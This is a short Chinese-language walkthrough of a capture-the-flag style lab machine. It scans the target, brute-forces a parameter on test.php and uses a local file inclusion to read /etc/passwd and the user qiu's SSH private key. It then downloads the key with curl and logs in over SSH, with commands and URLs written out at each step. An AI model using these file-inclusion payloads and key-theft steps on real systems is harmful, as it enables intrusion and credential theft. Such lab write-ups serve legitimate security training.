1.在kali中扫描靶机ip
arp-scan-l
访问靶机
2.在kali中扫描靶机端口
22/tcp open ssh
80/tcp open http
111/tcp closed rpcbind
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
3306/tcp open mysql
8000/tcp closed http-alt
8080/tcp closed http-proxy
8443/tcp closed https-alt
9090/tcp open zeus-admin
3.我们尝试分析80端口信息
用户为qiu
4.扫描靶机的目录
dirsearch -u "http://192.168.124.159"
我们发现了一个test.php文件,有点像有问题的文件
5.访问一下
提示缺少get参数
说明我们在该页面可以传参
6.我们尝试爆破一下参数
wfuzz -u "http://192.168.124.159/test.php?FUZZ" -w /usr/share/wfuzz/wordlist/general/big.txt --hh 80
爆破成功
7.我们使用file传参查看一下用户信息
http://192.168.124.159/test.php?file=/etc/passwd
看到了qiu用户
8.我们尝试查看qiu的ssh密钥
http://192.168.124.159/test.php?file=/home/qiu/.ssh/id_rsa
9.我们使用文件包含把qiu的ssh密钥下载到本地并查看
curl http://192.168.124.159/test.php?file=/home/qiu/.ssh/id_rsa > id_rsa"
cat id_rsa
10.我们需要600的权限才能使用密钥文件
chmod 600 id_rsa
连接ssh
ssh -i id_rsa qiu@192.168.124.159
